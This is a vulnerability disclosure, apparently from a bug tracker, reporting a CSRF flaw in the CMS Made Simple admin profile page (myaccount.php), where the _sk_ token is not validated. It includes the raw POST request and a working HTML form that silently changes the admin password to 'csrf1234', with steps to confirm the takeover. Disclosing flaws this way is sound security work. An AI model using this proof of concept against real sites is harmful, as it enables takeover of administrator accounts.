Summary:
CSRF in the admin profile page allows full admin account takeover
Detailed Description:
When an admin attempts to change their profile information, the following POST
request gets sent:
POST /cmsms/admin/myaccount.php?_sk_=SKVAL HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Cookie: [removed]
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
active_tab=maintab&submit_account=Submit&user=admin&password=&passwordagain=&firstname=cccc&lastname=sss&email=test@testhost.com
The problem is that the _sk_ value, which serves as a CSRF token, is not
validated on the server, allowing anyone to craft a POST request that gets sent
whenever an administrator is lured into opening a page controlled by that
someone. The following is an example HTML code that can be used to replicate the
issue:
<form action="http://localhost/cmsms/admin/myaccount.php" method="POST">
<input type="hidden" name="user" value="admin">
<input type="hidden" name="password" value="csrf1234">
<input type="hidden" name="passwordagain" value="csrf1234">
<input type="hidden" name="active_tab" value="maintab">
<input type="hidden" name="submit_account" value="Submit">
<input type="submit" value="CSRF!">
</form>
Paste the above markup to an HTML file and open it in a browser while logged in
with the admin account and click "CSRF!". Logout with the admin account and then
login with the password "csrf1234" to make sure the attack worked.
Regards,
Back to List
